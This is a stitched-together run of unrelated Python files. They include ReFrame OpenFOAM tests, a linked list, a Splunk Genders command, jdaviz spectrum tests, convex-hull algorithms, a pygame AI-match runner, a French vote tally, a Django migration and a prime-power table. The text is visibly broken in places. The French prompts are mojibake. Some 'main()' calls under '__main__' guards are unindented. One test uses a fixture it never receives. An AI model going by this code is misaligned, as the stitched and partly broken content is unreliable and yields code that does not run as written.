                         **kwargs)
class FoamToEnsight(OpenfoamExtendBaseTest):
    """Converter check: foamToEnsight on the flange tutorial.

    NOTE(review): the description says "check of setFields" -- looks
    copy-pasted; confirm and correct.
    """
    def __init__(self, **kwargs):
        super().__init__('foamToEnsight',
                         'OpenFOAM-Extend check of setFields: flange tutorial',
                         **kwargs)
class SetSet(OpenfoamExtendBaseTest):
    """Utility check: setSet batch run on the multi-region heater tutorial."""
    def __init__(self, **kwargs):
        super().__init__(
            'setSet',
            'OpenFOAM-Extend check of setFields: multi region heater tutorial',
            **kwargs)
        self.executable_opts = ['-batch makeCellSets.setSet']
class SetsToZones(OpenfoamExtendBaseTest):
    """Utility check: setsToZones on the multi-region heater tutorial."""
    def __init__(self, **kwargs):
        super().__init__(
            'setsToZones',
            'OpenFOAM-Extend check of setFields: multi region heater tutorial',
            **kwargs)
        self.executable_opts = ['-noFlipMap']
class SplitMeshRegions(OpenfoamExtendBaseTest):
    """Utility check: splitMeshRegions on the multi-region heater tutorial."""
    def __init__(self, **kwargs):
        super().__init__(
            'splitMeshRegions',
            'OpenFOAM-Extend check of setFields: multi region heater tutorial',
            **kwargs)
        self.executable_opts = ['-cellZones', '-overwrite']
class DecomposePar(OpenfoamExtendBaseTest):
    """Utility check: decomposePar of the heater region (multiRegionHeater)."""
    def __init__(self, **kwargs):
        super().__init__(
            'decomposePar',
            'OpenFOAM-Extend check of reconstructPar: multiRegionHeater test',
            **kwargs)
        self.executable_opts = ['-region heater']
class ChtMultiRegionSimpleFoam(OpenfoamExtendBaseTest):
    """Parallel solver check: chtMultiRegionSimpleFoam (4 MPI ranks)."""
    def __init__(self, **kwargs):
        super().__init__(
            'chtMultiRegionSimpleFoam',
            'OpenFOAM-Extend check of reconstructPar: multiRegionHeater test',
            **kwargs)
        self.executable_opts = ['-parallel']
        self.num_tasks = 4
        self.num_tasks_per_node = 4
        # Only the last five global continuity errors are checked (< 1e-4).
        result = sn.extractall(
            r'\sglobal\s=\s(?P<res>-?\S+),',
            self.stdout, 'res', float)[-5:]
        self.sanity_patterns = sn.all(
            sn.map(lambda x: sn.assert_lt(abs(x), 1.e-04), result))
class ReconstructPar(OpenfoamExtendBaseTest):
    """Utility check: reconstructPar of the heater region at the latest time."""
    def __init__(self, **kwargs):
        super().__init__(
            'reconstructPar',
            'OpenFOAM-Extend check of reconstructPar: multiRegionHeater test',
            **kwargs)
        self.executable_opts = ['-latestTime', '-region heater']
        # Processor directories from the earlier decomposition are inputs only.
        self.readonly_files = ['processor0',
                               'processor1',
                               'processor2',
                               'processor3']
        self.sanity_patterns = sn.assert_found(r'Time = 1000', self.stdout)
def _get_checks(**kwargs):
    """Instantiate every check in this module for the ReFrame runner."""
    check_classes = (
        BlockMesh, SnappyHexMesh, SimpleFoam, SetFields, InterMixingFoam,
        BuoyantBoussinesqSimpleFoam, LaplacianFoam, FoamToEnsight, SetSet,
        SetsToZones, SplitMeshRegions, DecomposePar, ChtMultiRegionSimpleFoam,
        ReconstructPar)
    return [cls(**kwargs) for cls in check_classes]
|
class Node:
    """A singly linked list node holding *data* and a link to the next node."""
    def __init__(self, data, nxt=None):
        self.data = data
        self.nxt = nxt


class linkedList:
    """Singly linked list with head/tail/positional insertion.

    BUG FIX: the constructor used to wrap its default argument in a node
    unconditionally, so `linkedList()` started with a phantom `Node(None)`
    at the head; every traversal (printList, find_middle) saw that bogus
    element and insert_tail's empty check could never fire. An explicit
    head value is still honoured: `linkedList(5)` starts as [5].
    """
    def __init__(self, head=None):
        # Only materialise a node when an initial value was actually given.
        self.head = Node(head) if head is not None else None

    def insert_head(self, val):
        """Prepend *val* in O(1)."""
        self.head = Node(val, self.head)

    def insert_tail(self, val):
        """Append *val* in O(n)."""
        new_node = Node(val)
        if self.head is None:
            self.head = new_node
        else:
            curr = self.head
            while curr.nxt:
                curr = curr.nxt
            curr.nxt = new_node

    def insert_index(self, val, index):
        """Insert *val* so it ends up at 0-based position *index*.

        BUG FIX: the index-0 branch assigned `temp.prev`, a leftover from a
        doubly linked implementation; Node has no prev link, so that write
        only created a stray attribute.
        """
        if index == 0:
            self.head = Node(val, self.head)
            return
        count = 0
        curr = self.head
        # Stop on the node just before the insertion point.
        while curr:
            if count == index - 1:
                break
            count += 1
            curr = curr.nxt
        new_node = Node(val)
        new_node.nxt = curr.nxt
        curr.nxt = new_node

    def printList(self):
        """Print one element per line from head to tail."""
        curr = self.head
        while curr:
            print(curr.data)
            curr = curr.nxt

    def find_middle(self):
        """Print the middle element (second of the two middles when even)."""
        fst_ptr = self.head
        slow_ptr = self.head
        # Fast/slow pointers: when fast hits the end, slow is at the middle.
        while fst_ptr and fst_ptr.nxt:
            fst_ptr = fst_ptr.nxt.nxt
            slow_ptr = slow_ptr.nxt
        if slow_ptr is not None:
            print(slow_ptr.data)
# Demo: build [4, 6, 8, 9, 10, 54, 45], print it, then print the middle.
new_node = linkedList()
new_node.insert_tail(4)
new_node.insert_tail(6)
new_node.insert_tail(8)
new_node.insert_tail(9)
new_node.insert_tail(10)
new_node.insert_tail(54)
new_node.insert_tail(45)
new_node.printList()
print("-------------")
new_node.find_middle()
|
#!/usr/bin/env python
#
# Name: gendershosts.py
# Desc: Splunk search command for parameterizing searches based on Genders queries
#
# Quickly hacked together by Wil Cooley <wcooley@pdx.edu>
#
import re
import sys
from subprocess import PIPE, STDOUT
import subprocess
def err(msg="Undetermined error"):
    # Report a failure to Splunk: search commands signal errors by printing
    # "ERROR" plus the message on stdout.
    # NOTE(review): exiting 0 on error is assumed to follow Splunk's
    # search-command protocol -- confirm before changing.
    print "ERROR"
    print msg
    sys.exit(0)
if __name__ == '__main__':
    # First CLI argument: the Genders query; default lists every host.
    if len(sys.argv) < 2:
        genders_query = '~NONE' # Trick to list all hosts
    else:
        genders_query = sys.argv[1]
    # Second CLI argument: column header for Splunk's tabular output.
    if len(sys.argv) > 2:
        header = sys.argv[2]
    else:
        header = "host"
    # Whitelist the characters a Genders query may contain; reject anything
    # else before the query reaches the subprocess call below.
    if re.search('[^\w\d&|~\-()=:\.]', genders_query):
        err("Inappropriate character in Genders query")
    # nodeattr -n prints one matching hostname per line.
    hosts = subprocess.Popen( ['/usr/bin/nodeattr', '-n', genders_query], \
            stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True).communicate()[0]
    print header
    print hosts,
|
def checkio(text, word):
    """Find *word* in *text* horizontally or vertically (spaces ignored).

    Returns [row1, col1, row2, col2] (1-based, inclusive) of the first match,
    scanning rows top-to-bottom and columns left-to-right, or None when the
    word does not occur.

    Generalized: the needle is now lower-cased too, matching the existing
    lower-casing of *text*, so mixed-case words behave consistently.
    """
    text = text.lower()
    word = word.lower()
    n = len(word)
    first_letter = word[0]
    # Grid of letters: one row per line, spaces stripped out.
    grid = [[ch for ch in line.replace(" ", "")] for line in text.split("\n")]
    rows = len(grid)
    for i in range(rows):
        for j in range(len(grid[i])):
            if grid[i][j] != first_letter:
                continue
            # Horizontal match starting at (i, j).
            if len(grid[i]) - j >= n and "".join(grid[i][j:j + n]) == word:
                return [i + 1, j + 1, i + 1, j + n]
            # Vertical match: short rows are padded with '#' so ragged rows
            # cannot produce a false positive.
            if rows - i >= n and "".join(
                    [row[j] if len(row) > j else "#" for row in grid][i:i + n]) == word:
                return [i + 1, j + 1, i + n, j + 1]
# Self-check asserts used by the CheckiO platform; not needed for auto-testing.
if __name__ == '__main__':
    # Horizontal match spanning two words ("counTEd" -> "ten" after spaces
    # are stripped), vertical match, and a ragged-row vertical match.
    assert checkio("""DREAMING of apples on a wall,
And dreaming often, dear,
I dreamed that, if I counted all,
-How many would appear?""", "ten") == [2, 14, 2, 16]
    assert checkio("""He took his vorpal sword in hand:
Long time the manxome foe he sought--
So rested he by the Tumtum tree,
And stood awhile in thought.
And as in uffish thought he stood,
The Jabberwock, with eyes of flame,
Came whiffling through the tulgey wood,
And burbled as it came!""", "noir") == [4, 16, 7, 16]
    assert checkio("""Hi all!
And all goodbye!
Of course goodbye.
or not""", "haoo") == [1, 1, 4, 1]
    assert checkio("""xa
xb
x""", "ab") == [1, 2, 2, 2]
    print("Coding complete? Click 'Check' to earn cool rewards!")
import pytest
from astropy.io import fits
from astropy.utils.data import download_file
from jdaviz.utils import PRIHDR_KEY
@pytest.mark.remote_data
def test_2d_parser_jwst(specviz2d_helper):
    """Loading a JWST 2D spectrum yields a 2D dataset plus an auto-extracted
    1D spectrum with matching flux units, and mouseover coords report values."""
    fn = download_file('https://stsci.box.com/shared/static/exnkul627fcuhy5akf2gswytud5tazmw.fits', cache=True)  # noqa
    specviz2d_helper.load_data(spectrum_2d=fn)
    assert len(specviz2d_helper.app.data_collection) == 2
    dc_0 = specviz2d_helper.app.data_collection[0]
    assert dc_0.label == 'Spectrum 2D'
    # JWST primary-header metadata should be flattened, not nested.
    assert PRIHDR_KEY not in dc_0.meta
    assert 'header' not in dc_0.meta
    assert dc_0.meta['DETECTOR'] == 'MIRIMAGE'
    assert dc_0.get_component('flux').units == 'MJy / sr'
    dc_1 = specviz2d_helper.app.data_collection[1]
    assert dc_1.label == 'Spectrum 1D'
    assert 'header' not in dc_1.meta
    # extracted 1D spectrum should have same flux units as 2d spectrum
    assert dc_1.get_component('flux').units == dc_0.get_component('flux').units
    # Also check the coordinates info panel.
    viewer_2d = specviz2d_helper.app.get_viewer('spectrum-2d-viewer')
    label_mouseover = specviz2d_helper.app.session.application._tools['g-coords-info']
    label_mouseover._viewer_mouse_event(viewer_2d,
                                        {'event': 'mousemove', 'domain': {'x': 350, 'y': 30}})
    assert label_mouseover.as_text() == ('Pixel x=0350.0 y=0030.0 Value +3.22142e+04 MJy / sr',
                                         '', '')
@pytest.mark.remote_data
def test_2d_parser_ext_transpose_file(specviz2d_helper):
    """The ext= and transpose= options are honoured when loading by filename."""
    fn = download_file('https://stsci.box.com/shared/static/e3n30l8vr7hkpnuy7g0t8c5nbl70632b.fits', cache=True)  # noqa
    specviz2d_helper.load_data(spectrum_2d=fn, ext=2, transpose=True)
    dc_0 = specviz2d_helper.app.data_collection[0]
    assert dc_0.get_component('flux').shape == (3416, 29)
@pytest.mark.remote_data
def test_2d_parser_ext_transpose_hdulist(specviz2d_helper):
    """Same as the filename case above, but loading from an open HDUList."""
    fn = download_file('https://stsci.box.com/shared/static/e3n30l8vr7hkpnuy7g0t8c5nbl70632b.fits', cache=True)  # noqa
    with fits.open(fn) as hdulist:
        specviz2d_helper.load_data(spectrum_2d=hdulist, ext=2, transpose=True)
    dc_0 = specviz2d_helper.app.data_collection[0]
    assert dc_0.get_component('flux').shape == (3416, 29)
def test_2d_parser_no_unit(specviz2d_helper):
    """A unitless 2D spectrum loads with empty flux units, and both the
    2D and 1D coordinates-info read-outs behave."""
    specviz2d_helper.load_data(mos_spectrum2d, spectrum_2d_label='my_2d_spec')

    collection = specviz2d_helper.app.data_collection
    assert len(collection) == 2

    spec2d = collection[0]
    assert spec2d.label == 'my_2d_spec 2D'
    assert spec2d.get_component('flux').units == ''

    spec1d = collection[1]
    assert spec1d.label == 'Spectrum 1D'
    assert spec1d.get_component('flux').units == spec2d.get_component('flux').units

    # Also check the coordinates info panels.
    viewer_2d = specviz2d_helper.app.get_viewer('spectrum-2d-viewer')
    label_mouseover = specviz2d_helper.app.session.application._tools['g-coords-info']
    label_mouseover._viewer_mouse_event(viewer_2d,
                                        {'event': 'mousemove', 'domain': {'x': 0, 'y': 0}})
    assert label_mouseover.as_text() == ('Pixel x=00000.0 y=00000.0 Value +3.74540e-01', '', '')
    assert label_mouseover.icon == 'a'

    viewer_1d = specviz2d_helper.app.get_viewer('spectrum-viewer')
    # need to trigger a mouseleave or mouseover to reset the traitlets
    label_mouseover._viewer_mouse_event(viewer_1d, {'event': 'mouseenter'})
    label_mouseover._viewer_mouse_event(viewer_1d,
                                        {'event': 'mousemove', 'domain': {'x': 7.2e-6, 'y': 3}})
    assert label_mouseover.as_text() == ('Cursor 7.20000e-06, 3.00000e+00',
                                         'Wave 7.00000e-06 m (6 pix)',
                                         'Flux -3.59571e+00')
    assert label_mouseover.icon == 'b'
def test_1d_parser(specviz2d_helper, spectrum1d):
    """A 1D-only load produces exactly one dataset with its uncertainty
    metadata preserved."""
    specviz2d_helper.load_data(spectrum_1d=spectrum1d)
    collection = specviz2d_helper.app.data_collection
    assert len(collection) == 1
    loaded = collection[0]
    assert loaded.label == 'Spectrum 1D'
    assert loaded.meta['uncertainty_type'] == 'std'
def test_2d_1d_parser(specviz2d_helper, mos_spectrum2d, spectrum1d):
    """Loading both spectra at once yields both default labels."""
    specviz2d_helper.load_data(spectrum_2d=mos_spectrum2d, spectrum_1d=spectrum1d)
    labels = specviz2d_helper.app.data_collection.labels
    assert labels == ['Spectrum 2D', 'Spectrum 1D']
def test_parser_no_data(specviz2d_helper):
    """Calling load_data with neither spectrum must raise."""
    with pytest.raises(ValueError, match='Must provide spectrum_2d or spectrum_1d'):
        specviz2d_helper.load_data()
|
# To do: Briefs, Parameters and beta test
"""
Problem:
https://en.wikipedia.org/wiki/Convex_hull
Solutions:
Brute force
DnC
"""
from typing import Iterable, List, Set, Union
class Point:
    """
    A 2-D point ordered lexicographically: by x first, then by y.

    Examples
    --------
    >>> Point(1, 2)
    (1.0, 2.0)
    >>> Point("1", "2")
    (1.0, 2.0)
    >>> Point(1, 2) > Point(0, 1)
    True
    >>> Point(1, 1) == Point(1, 1)
    True
    >>> Point(-0.5, 1) == Point(0.5, 1)
    False
    >>> Point("pi", "e")
    Traceback (most recent call last):
    ...
    ValueError: could not convert string to float: 'pi'
    """

    def __init__(self, x, y):
        self.x, self.y = float(x), float(y)

    def __eq__(self, other):
        return self.x == other.x and self.y == other.y

    def __ne__(self, other):
        return not self == other

    def __gt__(self, other):
        if self.x > other.x:
            return True
        elif self.x == other.x:
            return self.y > other.y
        return False

    def __lt__(self, other):
        # BUG FIX: this used to be ``not self > other``, which wrongly
        # reported two *equal* points as "less than" each other and broke
        # the total-order contract with __eq__/__gt__.
        if self.x < other.x:
            return True
        elif self.x == other.x:
            return self.y < other.y
        return False

    def __ge__(self, other):
        if self.x > other.x:
            return True
        elif self.x == other.x:
            return self.y >= other.y
        return False

    def __le__(self, other):
        if self.x < other.x:
            return True
        elif self.x == other.x:
            return self.y <= other.y
        return False

    def __repr__(self):
        return f"({self.x}, {self.y})"

    def __hash__(self):
        # Hash both coordinates (still consistent with __eq__) for a far
        # better spread than hashing x alone.
        return hash((self.x, self.y))
def _construct_points(
    list_of_tuples: Union[List[Point], List[List[float]], Iterable[List[float]]]
) -> List[Point]:
    """
    Convert an iterable of 2-sequences (or Point instances) into a list of
    Points, skipping (and reporting) anything that is not coordinate-like.

    Examples
    -------
    >>> _construct_points([[1, 1], [2, -1], [0.3, 4]])
    [(1.0, 1.0), (2.0, -1.0), (0.3, 4.0)]
    >>> _construct_points([1, 2])
    Ignoring deformed point 1. All points must have at least 2 coordinates.
    Ignoring deformed point 2. All points must have at least 2 coordinates.
    []
    >>> _construct_points([])
    []
    >>> _construct_points(None)
    []
    """
    points: List[Point] = []
    if list_of_tuples:
        for candidate in list_of_tuples:
            if isinstance(candidate, Point):
                points.append(candidate)
                continue
            try:
                points.append(Point(candidate[0], candidate[1]))
            except (IndexError, TypeError):
                print(
                    f"Ignoring deformed point {candidate}. All points"
                    " must have at least 2 coordinates."
                )
    return points
def _validate_input(points: Union[List[Point], List[List[float]]]) -> List[Point]:
    """
    Reject non-iterable or empty input, then normalise to a list of Points.

    Examples
    -------
    >>> _validate_input([[1, 2]])
    [(1.0, 2.0)]
    >>> _validate_input([(1, 2)])
    [(1.0, 2.0)]
    >>> _validate_input([Point(2, 1), Point(-1, 2)])
    [(2.0, 1.0), (-1.0, 2.0)]
    >>> _validate_input([])
    Traceback (most recent call last):
    ...
    ValueError: Expecting a list of points but got []
    >>> _validate_input(1)
    Traceback (most recent call last):
    ...
    ValueError: Expecting an iterable object but got an non-iterable type 1
    """
    # Guard clauses: non-iterables first so their message wins.
    if not hasattr(points, "__iter__"):
        msg = f"Expecting an iterable object but got an non-iterable type {points}"
        raise ValueError(msg)
    if not points:
        msg = f"Expecting a list of points but got {points}"
        raise ValueError(msg)
    return _construct_points(points)
def _det(a: Point, b: Point, c: Point) -> float:
    """
    Twice the signed area of triangle abc: positive when c lies to the left
    of the directed line a->b, negative to the right, zero when collinear.

    Examples
    ----------
    >>> _det(Point(1, 1), Point(1, 2), Point(1, 5))
    0.0
    >>> _det(Point(0, 0), Point(10, 0), Point(0, 10))
    100.0
    >>> _det(Point(0, 0), Point(10, 0), Point(0, -10))
    -100.0
    """
    positive = a.x * b.y + b.x * c.y + c.x * a.y
    negative = a.y * b.x + b.y * c.x + c.y * a.x
    return positive - negative
def convex_hull_bf(points: List[Point]) -> List[Point]:
    """
    Brute-force convex hull: an edge (i, j) is on the hull iff every other
    point lies on one side of it.  O(n^3).

    Examples
    ---------
    >>> convex_hull_bf([[0, 0], [1, 0], [10, 1]])
    [(0.0, 0.0), (1.0, 0.0), (10.0, 1.0)]
    >>> convex_hull_bf([[0, 0], [1, 0], [10, 0]])
    [(0.0, 0.0), (10.0, 0.0)]
    >>> convex_hull_bf([[-1, 1],[-1, -1], [0, 0], [0.5, 0.5], [1, -1], [1, 1],
    ...                 [-0.75, 1]])
    [(-1.0, -1.0), (-1.0, 1.0), (1.0, -1.0), (1.0, 1.0)]
    >>> convex_hull_bf([(0, 3), (2, 2), (1, 1), (2, 1), (3, 0), (0, 0), (3, 3),
    ...                 (2, -1), (2, -4), (1, -3)])
    [(0.0, 0.0), (0.0, 3.0), (1.0, -3.0), (2.0, -4.0), (3.0, 0.0), (3.0, 3.0)]
    """
    points = sorted(_validate_input(points))
    n = len(points)
    hull_points = set()
    for i in range(n - 1):
        for j in range(i + 1, n):
            seen_left = seen_right = False
            keep_edge = True
            for k in range(n):
                if k == i or k == j:
                    continue
                orientation = _det(points[i], points[j], points[k])
                if orientation > 0:
                    seen_left = True
                elif orientation < 0:
                    seen_right = True
                elif points[k] < points[i] or points[k] > points[j]:
                    # Collinear point outside the segment [i, j]: the
                    # segment cannot be a hull edge.
                    keep_edge = False
                    break
                if seen_left and seen_right:
                    # Points on both sides: not a hull edge.
                    keep_edge = False
                    break
            if keep_edge:
                hull_points.update((points[i], points[j]))
    return sorted(hull_points)
def convex_hull_recursive(points: List[Point]) -> List[Point]:
    """
    QuickHull-style divide and conquer: split points by the line through the
    extreme-x points, then recurse on each side via _construct_hull.

    Examples
    ---------
    >>> convex_hull_recursive([[0, 0], [1, 0], [10, 1]])
    [(0.0, 0.0), (1.0, 0.0), (10.0, 1.0)]
    >>> convex_hull_recursive([[0, 0], [1, 0], [10, 0]])
    [(0.0, 0.0), (10.0, 0.0)]
    >>> convex_hull_recursive([[-1, 1],[-1, -1], [0, 0], [0.5, 0.5], [1, -1], [1, 1],
    ...                        [-0.75, 1]])
    [(-1.0, -1.0), (-1.0, 1.0), (1.0, -1.0), (1.0, 1.0)]
    >>> convex_hull_recursive([(0, 3), (2, 2), (1, 1), (2, 1), (3, 0), (0, 0), (3, 3),
    ...                        (2, -1), (2, -4), (1, -3)])
    [(0.0, 0.0), (0.0, 3.0), (1.0, -3.0), (2.0, -4.0), (3.0, 0.0), (3.0, 3.0)]
    """
    points = sorted(_validate_input(points))
    n = len(points)

    # The extreme-x points are always on the hull.
    leftmost = points[0]
    rightmost = points[n - 1]
    hull = {leftmost, rightmost}

    above = []
    below = []
    for candidate in points[1 : n - 1]:
        side = _det(leftmost, rightmost, candidate)
        if side > 0:
            above.append(candidate)
        elif side < 0:
            below.append(candidate)

    _construct_hull(above, leftmost, rightmost, hull)
    _construct_hull(below, rightmost, leftmost, hull)
    return sorted(hull)
def _construct_hull(
    points: List[Point], left: Point, right: Point, convex_set: Set[Point]
) -> None:
    """
    Recursive QuickHull step: among ``points``, find hull vertices lying
    strictly to the left of the directed line ``left`` -> ``right`` and add
    them to ``convex_set``.

    Parameters
    ----------
    points : candidate points for this sub-problem
    left, right : endpoints of the current dividing segment (both already
        known to be hull vertices)
    convex_set : accumulator of hull points, mutated in place

    Returns
    -------
    None (results are accumulated in ``convex_set``)
    """
    if points:
        extreme_point = None
        extreme_point_distance = float("-inf")
        candidate_points = []
        # The point with the largest positive determinant is the farthest
        # from the line left->right and is guaranteed to be a hull vertex.
        for p in points:
            det = _det(left, right, p)
            if det > 0:
                candidate_points.append(p)
                if det > extreme_point_distance:
                    extreme_point_distance = det
                    extreme_point = p
        if extreme_point:
            # Recurse on the two sub-regions outside the triangle
            # (left, extreme_point, right); points inside it are discarded
            # implicitly by the det > 0 filter above.
            _construct_hull(candidate_points, left, extreme_point, convex_set)
            convex_set.add(extreme_point)
            _construct_hull(candidate_points, extreme_point, right, convex_set)
def convex_hull_melkman(points: List[Point]) -> List[Point]:
    """
    Melkman-style incremental convex hull over the sorted points, keeping
    the hull in circular order with a duplicated endpoint.

    Examples
    >>> convex_hull_melkman([[0, 0], [1, 0], [10, 1]])
    [(0.0, 0.0), (1.0, 0.0), (10.0, 1.0)]
    >>> convex_hull_melkman([[0, 0], [1, 0], [10, 0]])
    [(0.0, 0.0), (10.0, 0.0)]
    >>> convex_hull_melkman([[-1, 1],[-1, -1], [0, 0], [0.5, 0.5], [1, -1], [1, 1],
    ...                      [-0.75, 1]])
    [(-1.0, -1.0), (-1.0, 1.0), (1.0, -1.0), (1.0, 1.0)]
    >>> convex_hull_melkman([(0, 3), (2, 2), (1, 1), (2, 1), (3, 0), (0, 0), (3, 3),
    ...                      (2, -1), (2, -4), (1, -3)])
    [(0.0, 0.0), (0.0, 3.0), (1.0, -3.0), (2.0, -4.0), (3.0, 0.0), (3.0, 3.0)]
    """
    points = sorted(_validate_input(points))
    n = len(points)

    # Seed the hull with the first two points, scanning past any collinear
    # prefix until a point off the line is found.
    convex_hull = points[:2]
    for i in range(2, n):
        det = _det(convex_hull[1], convex_hull[0], points[i])
        if det > 0:
            convex_hull.insert(0, points[i])
            break
        elif det < 0:
            convex_hull.append(points[i])
            break
        else:
            convex_hull[1] = points[i]
    i += 1
    for i in range(i, n):
        # BUG FIX: the second test previously used ``points[1]`` (a fixed
        # point) instead of ``points[i]``, so the interior-point check
        # compared the wrong point and could mis-classify candidates.
        if (
            _det(convex_hull[0], convex_hull[-1], points[i]) > 0
            and _det(convex_hull[-1], convex_hull[0], points[i]) < 0
        ):
            # The point lies within the convex hull
            continue

        convex_hull.insert(0, points[i])
        convex_hull.append(points[i])
        # Restore convexity at both ends of the circular hull.
        while _det(convex_hull[0], convex_hull[1], convex_hull[2]) >= 0:
            del convex_hull[1]
        while _det(convex_hull[-1], convex_hull[-2], convex_hull[-3]) <= 0:
            del convex_hull[-2]

    # ``convex_hull`` holds the hull in circular order with a duplicated
    # endpoint; drop the duplicate before returning the sorted result.
    return sorted(convex_hull[1:] if len(convex_hull) > 3 else convex_hull)
def main():
    """Demonstrate that all three hull implementations agree on a sample."""
    sample = [
        (0, 3),
        (2, 2),
        (1, 1),
        (2, 1),
        (3, 0),
        (0, 0),
        (3, 3),
        (2, -1),
        (2, -4),
        (1, -3),
    ]
    # the convex set of points is
    # [(0, 0), (0, 3), (1, -3), (2, -4), (3, 0), (3, 3)]
    expected = convex_hull_bf(sample)
    assert expected == convex_hull_recursive(sample)
    assert expected == convex_hull_melkman(sample)
    print(expected)
if __name__ == "__main__":
main() |
"""
Contains the Game Interface class.
"""
import sys
import pygame as pg
from game import *
""" Import Multiple AIs """
total_trial = 1000
class Game_Count(Game):
    """Muted ``Game`` subclass used to run repeated AI-vs-AI matches and
    report each match's outcome.

    NOTE(review): relies on names star-imported from ``game`` (``Plane``,
    ``Player``, ``playerlist``, ``p1_init_pos``, ...) -- their semantics
    are assumed here; confirm against that module.
    """

    def __init__(self):
        # Mute audio: matches run in an unattended batch.
        super().__init__(mute = True)

    def reset(self):
        """Re-initialise both planes, their displays and the sprite group
        for a fresh match."""
        self.close = False
        self.winner = None
        self.all_sprites = pg.sprite.Group()
        self.players = [Plane(playerlist[0], 0, p1_init_pos.copy(), mute = self.mute),
                        Plane(playerlist[1], 1, p2_init_pos.copy(), mute = self.mute)]
        # Each plane keeps a reference to its opponent.
        self.players[0].enemy = self.players[1]
        self.players[1].enemy = self.players[0]
        self.playerdisplay = [Player(self.players[0], self.PlaneImg[0], (128, 220, 32)),
                              Player(self.players[1], self.PlaneImg[1], (220, 64, 64))]
        for _ in self.playerdisplay:
            self.all_sprites.add(_)

    def run(self, record = False, count = 0):
        """Play one match to completion and return
        ``(winner, hp1, hp2, crashed)``; a crashed player's hp is reported
        as 0.  When ``record`` is true the final frame is saved to
        ``result/winimg<count>.png``."""
        while not self.close and self.winner == None:
            self.event_loop()
            self.update()
            self.draw()
        if record:
            fname = "result/winimg" + str(count) + ".png"
            pg.image.save(self.screen, fname)
        hp1 = self.players[0].hp
        hp2 = self.players[1].hp
        crashed = False
        if self.players[0].crashed:
            hp1 = 0
            crashed = True
        if self.players[1].crashed:
            hp2 = 0
            crashed = True
        return (self.winner, hp1, hp2, crashed)
        # while not self.close:
        #     self.event_loop()
def main():
    """Run ``total_trial`` AI-vs-AI matches, tally wins per AI and print a
    summary; sides are swapped randomly between matches."""
    game = Game_Count()
    winner = [0, 0]  # [AI_RL wins, AI_HC wins]
    for trial_count in range(total_trial):
        game.reset()
        print('Game #{} Running ... '.format(trial_count), end = '')
        # Save a screenshot for every 20th match.
        res, hp1, hp2, crashed = game.run(record = trial_count % 20 == 0, count = trial_count)
        if game.close:
            # Window closed by the user -- abort the tournament.
            break
        # NOTE(review): a tie (hp1 == hp2) falls into the else branch and is
        # credited to AI_HC -- confirm that is intended.
        if hp1 > hp2 and playerlist[0] == PlayerState.AI_RL or hp1 < hp2 and playerlist[1] == PlayerState.AI_RL:
            print('AI_RL wins with', '{}:{}'.format(hp1, hp2), end = '')
            if crashed:
                print(' due to crashing')
            else:
                print()
            winner[0] += 1
        else:
            print('AI_HC wins with', '{}:{}'.format(hp1, hp2), end = '')
            if crashed:
                print(' due to crashing')
            else:
                print()
            winner[1] += 1
        # Randomly swap sides for the next match to cancel any positional bias.
        if random.random() >= 0.5:
            playerlist[0], playerlist[1] = playerlist[1], playerlist[0]
    if winner[0] > winner[1]:
        argmax = 0
    else:
        argmax = 1
    # NOTE(review): winner[] counts per-AI wins, but this message reports a
    # "Player" index even though sides were swapped during the run.
    print('Player', argmax + 1, 'wins', winner[argmax], 'of', total_trial, 'matches')
    pg.quit()
    sys.exit()
'''
Check if main.py is the called program.
'''
if __name__ == '__main__':
main()
|
# Ce programme prend les résultats d'un vote comme données et retourne le résultat :
# unanimité, majorité claire, majorité simple, la motion ne passe pas. Une fonction est
# utilisée pour calculer le pourcentage et les conditions déterminent le résultat.
def vote_pourcentage(ch):
    """Return the fraction (0.0 to 1.0) of active voters who voted 'oui'.

    Parameters
    ----------
    ch : str
        Whitespace-separated votes: 'oui', 'non' or 'abstention'.

    Abstentions are not counted.  ROBUSTNESS FIX: when nobody voted
    'oui' or 'non' (all abstentions, or empty input) this now returns
    0.0 instead of raising ZeroDivisionError.
    """
    # Count the 'oui's and the 'non's in the raw ballot string.
    nOui = float(ch.count('oui'))
    nNon = float(ch.count('non'))
    total = nOui + nNon
    if total == 0:
        return 0.0
    # Fraction of 'oui' among the people who actually voted oui or non.
    return nOui / total
# Ask the user for the ballot results.
votes = input('''Entrez les votes (oui, non, ou abstention) sรฉparรฉs par des espaces, et ร  la
fin appuyez enter: ''')

# Compute the 'oui' ratio and classify it against the thresholds.
ratio = vote_pourcentage(votes)
if ratio == 1:
    print('unanimitรฉ')
elif ratio >= 2 / 3:
    print('majoritรฉ claire')
elif ratio >= 1 / 2:
    print('majoritรฉ simple')
else:
    print('la motion ne passe pas')
|
import turtle

# Palette cycled through as the spiral grows.
colors=["red","blue","purple","green","orange","pink"]
t=turtle.Pen()
turtle.bgcolor("black")
# Draw 360 segments of increasing length; turning 59 degrees each step
# (just under 60) produces a slowly rotating six-armed spiral.
for x in range(360):
    t.pencolor(colors[x%len(colors)])  # cycle through the palette
    t.width(x/100+1)                   # thicken the line as it grows
    t.forward(x)
    t.left(59)
# Generated by Django 3.0.3 on 2020-10-25 01:04
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated by Django's makemigrations; normally not edited by hand.

    dependencies = [
        ('bagel_site', '0012_auto_20201025_0036'),
    ]

    operations = [
        # Make LineItem.associated_line_item a nullable self-referential FK;
        # deleting the target row cascades to this one.
        migrations.AlterField(
            model_name='lineitem',
            name='associated_line_item',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='lineitem', to='bagel_site.LineItem'),
        ),
    ]
|
import codecs
# Upper bound of the search range.
n = 10**8

# Load all primes below n from a precomputed file (one prime per line).
primes = []
for i in codecs.open('prime.txt', 'r', 'utf-8'):
    if int(i.strip()) < n:
        primes.append(int(i))
    else:
        break
print ('read primes over')

# d maps each prime power p**k (<= n) to the smallest kk such that p**k
# divides kk! -- k accumulates the p-adic valuation of kk! as kk walks the
# multiples of p (Legendre's formula evaluated incrementally).
# NOTE(review): this looks like the precomputation for a "smallest
# factorial divisible by x" problem -- confirm against the caller.
d = {}
for i, p in enumerate(primes):
    if i % 100 == 0:
        print (i, p)  # progress indicator
    k = 0
    for kk in range(p, n+1, p):
        x = kk
        # Add the multiplicity of p in kk to the running valuation k.
        while x > 0 and x % p == 0:
            x //= p
            k += 1
        if p**k > n:
            break
        d[p**k] = kk
        if p**k > n:
            break
print ('d cal over')
def divisior(x):
    """Return the maximum d[p**k] over the prime-power factorisation of x,
    or -1 when x <= 1.  Uses the module-level ``primes`` list and ``d``
    table built above."""
    ans = -1
